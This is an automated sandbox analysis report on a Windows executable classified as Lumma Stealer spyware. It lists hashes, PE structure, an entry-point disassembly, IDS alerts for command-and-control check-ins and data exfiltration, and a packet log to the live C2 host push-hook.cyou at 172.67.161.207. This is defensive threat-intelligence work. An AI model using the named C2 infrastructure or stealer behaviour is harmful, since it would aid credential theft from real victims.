                                                                  172.67.161.207
                                                                  push-hook.cyouUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1561844
                                                                  Start date and time:2024-11-24 13:27:31 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 45s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:7
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 67%
                                                                  • Number of executed functions: 26
                                                                  • Number of non-executed functions: 66
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: file.exe
                                                                  No simulations
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  172.67.161.207INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                  Stolen Images Evidence.jsGet hashmaliciousUnknownBrowse
                                                                  • mabiorex.space/333g100/index.php
                                                                  Stolen Images Evidence.jsGet hashmaliciousUnknownBrowse
                                                                  • mabiorex.space/333g100/index.php
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  push-hook.cyoufile.exeGet hashmaliciousLummaCBrowse
                                                                  • 188.114.97.3
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                  • 104.21.33.116
                                                                  lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.66.0.227
                                                                  mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.74.152
                                                                  2aiDfP0r7h.lnkGet hashmaliciousUnknownBrowse
                                                                  • 104.16.230.132
                                                                  OVtsE8ZkBE.lnkGet hashmaliciousUnknownBrowse
                                                                  • 104.16.231.132
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.162.84
                                                                  zapret.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.26.13.205
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.161.207
                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                  • 172.67.161.207
                                                                  lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.161.207
                                                                  mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.161.207
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.161.207
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.161.207
                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 172.67.161.207
                                                                  IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.161.207
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.161.207
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.691993266523074
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:file.exe
                                                                  File size:513'536 bytes
                                                                  MD5:7dc51c5014010a56bd8a33d256831a30
                                                                  SHA1:a53650f246ad15a2091b55e59b0a054a9bbcfb8b
                                                                  SHA256:49118fb0d2560d592dcad173d9ecd9b50b0c2fe1bcd3f6e39f841e1a00470852
                                                                  SHA512:92aa662d5047d965ca93ed7f22aab9d16e47cf1d7a0b9f593c43aea2cccc94e8bb697808ff9fbfd6010cc02b7cd2c15395a4218b5e3c234a2ce3b0124998ddd6
                                                                  SSDEEP:12288:MuYPABqG93bG2zYH13IgLmfJ/+czMnKLESaK1g1Z:dYPABNLGTV33I+czvFaT1Z
                                                                  TLSH:74B4E02AB5A3A0A3F5932C354194AA75851FBF350F22A5FB57201B786F3B5D2C132B43
                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ag.................h........................@..........................0............@.................................T...<..
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x41a890
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows cui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6741DAB7 [Sat Nov 23 13:37:59 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                  Instruction
                                                                  call 00007F5D0481602Ah
                                                                  jmp 00007F5D04815E8Dh
                                                                  mov ecx, dword ptr [004305F0h]
                                                                  push esi
                                                                  push edi
                                                                  mov edi, BB40E64Eh
                                                                  mov esi, FFFF0000h
                                                                  cmp ecx, edi
                                                                  je 00007F5D04816026h
                                                                  test esi, ecx
                                                                  jne 00007F5D04816048h
                                                                  call 00007F5D04816051h
                                                                  mov ecx, eax
                                                                  cmp ecx, edi
                                                                  jne 00007F5D04816029h
                                                                  mov ecx, BB40E64Fh
                                                                  jmp 00007F5D04816030h
                                                                  test esi, ecx
                                                                  jne 00007F5D0481602Ch
                                                                  or eax, 00004711h
                                                                  shl eax, 10h
                                                                  or ecx, eax
                                                                  mov dword ptr [004305F0h], ecx
                                                                  not ecx
                                                                  pop edi
                                                                  mov dword ptr [004305ECh], ecx
                                                                  pop esi
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  sub esp, 14h
                                                                  and dword ptr [ebp-0Ch], 00000000h
                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                  and dword ptr [ebp-08h], 00000000h
                                                                  push eax
                                                                  call dword ptr [0042E46Ch]
                                                                  mov eax, dword ptr [ebp-08h]
                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                  mov dword ptr [ebp-04h], eax
                                                                  call dword ptr [0042E430h]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  call dword ptr [0042E42Ch]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  lea eax, dword ptr [ebp-14h]
                                                                  push eax
                                                                  call dword ptr [0042E4A8h]
                                                                  mov eax, dword ptr [ebp-10h]
                                                                  lea ecx, dword ptr [ebp-04h]
                                                                  xor eax, dword ptr [ebp-14h]
                                                                  xor eax, dword ptr [ebp-04h]
                                                                  xor eax, ecx
                                                                  leave
                                                                  ret
                                                                  mov eax, 00004000h
                                                                  ret
                                                                  push 00431970h
                                                                  call dword ptr [0042E488h]
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  mov al, 01h
                                                                  ret
                                                                  push 00030000h
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e2540x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x340000x143c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x287c00xc0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2e3c80x138.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x266ba0x268009fc12b2919d7993b7875b406673b0c41False0.5423155945616883data6.676506145316532IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x280000x72640x7400662c29d34464011348a2d81d315c214bFalse0.40833782327586204data4.811823385654876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x300000x20680x100051c3c578bc7da757e8ebeb0ea4aceef9False0.484619140625OpenPGP Secret Key5.084546541546572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .bss0x330000x80x20064e01fde7e0180fcba7fdb172e6bbca6False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x340000x143c0x1600a55fdfa9c914f00e7079e3187805e326False0.7510653409090909data6.285750152953626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  .coS0x360000x4cc000x4cc006290a165a90da79884f6db5fc3416ad6False1.000337184446254data7.999418311050769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  DLLImport
                                                                  KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                  GDI32.dllCreateEllipticRgn
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-24T13:28:26.947808+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.161.207443TCP
                                                                  2024-11-24T13:28:28.391969+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.161.207443TCP
                                                                  2024-11-24T13:28:28.391969+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.161.207443TCP
                                                                  2024-11-24T13:28:29.679577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.161.207443TCP
                                                                  2024-11-24T13:28:30.377505+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.161.207443TCP
                                                                  2024-11-24T13:28:30.377505+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.161.207443TCP
                                                                  2024-11-24T13:28:31.967163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.161.207443TCP
                                                                  2024-11-24T13:28:34.333964+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.161.207443TCP
                                                                  2024-11-24T13:28:36.718837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.161.207443TCP
                                                                  2024-11-24T13:28:39.545095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.161.207443TCP
                                                                  2024-11-24T13:28:40.250640+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.161.207443TCP
                                                                  2024-11-24T13:28:42.319305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.161.207443TCP
                                                                  2024-11-24T13:28:48.318465+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.161.207443TCP
                                                                  2024-11-24T13:28:49.042986+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.161.207443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 24, 2024 13:28:25.707968950 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:25.707990885 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:25.708168983 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:25.711374998 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:25.711390018 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:26.947737932 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:26.947808027 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:27.090934992 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:27.090946913 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:27.091254950 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:27.155019045 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:27.562056065 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:27.562092066 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:27.562169075 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:28.391997099 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:28.392111063 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:28.392184973 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:28.394568920 CET49730443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:28.394579887 CET44349730172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:28.441118002 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:28.441221952 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:28.441329002 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:28.441623926 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:28.441656113 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:29.679464102 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:29.679577112 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:29.687242031 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:29.687263966 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:29.687577009 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:29.688807011 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:29.688844919 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:29.688895941 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377530098 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377580881 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377616882 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377640009 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.377650023 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377662897 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377696037 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.377717018 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.377763987 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.377787113 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.386003971 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.386064053 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.386081934 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.402859926 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.402914047 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.402935982 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.451906919 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.497250080 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.545665979 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.545711994 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.577797890 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.577846050 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.577871084 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.577894926 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.577951908 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.578020096 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.578054905 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.578083038 CET49731443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.578097105 CET44349731172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.667752028 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.667838097 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:30.667923927 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.668325901 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:30.668364048 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:31.966943026 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:31.967163086 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:31.968548059 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:31.968580961 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:31.968830109 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:31.970065117 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:31.970254898 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:31.970303059 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:31.970386028 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:31.970400095 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:33.019207001 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:33.019300938 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:33.019365072 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:33.019567966 CET49732443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:33.019610882 CET44349732172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:33.096831083 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:33.096931934 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:33.097026110 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:33.097347021 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:33.097381115 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:34.333877087 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:34.333964109 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:34.335335016 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:34.335367918 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:34.335607052 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:34.336690903 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:34.336795092 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:34.336833954 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:35.229486942 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:35.229600906 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:35.229717970 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:35.230057001 CET49733443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:35.230101109 CET44349733172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:35.444794893 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:35.444880962 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:35.444967985 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:35.445318937 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:35.445353031 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:36.718710899 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:36.718837023 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:36.720297098 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:36.720347881 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:36.720599890 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:36.721820116 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:36.721975088 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:36.722024918 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:36.722105026 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:36.722136974 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:37.603647947 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:37.603768110 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:37.603827953 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:37.604058027 CET49734443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:37.604091883 CET44349734172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:38.266875982 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:38.266972065 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:38.267086983 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:38.267432928 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:38.267479897 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:39.544965982 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:39.545094967 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:39.546515942 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:39.546550035 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:39.546789885 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:39.548065901 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:39.548151016 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:39.548162937 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:40.250648975 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:40.250739098 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:40.250833988 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:40.262191057 CET49735443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:40.262240887 CET44349735172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:40.976569891 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:40.976655960 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:40.976747990 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:40.977108955 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:40.977148056 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.319107056 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.319304943 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.320496082 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.320533991 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.320775986 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.336457014 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.337310076 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.337357044 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.338012934 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.338061094 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.338371992 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.338426113 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.338674068 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.338723898 CET44349736172.67.161.207192.168.2.4
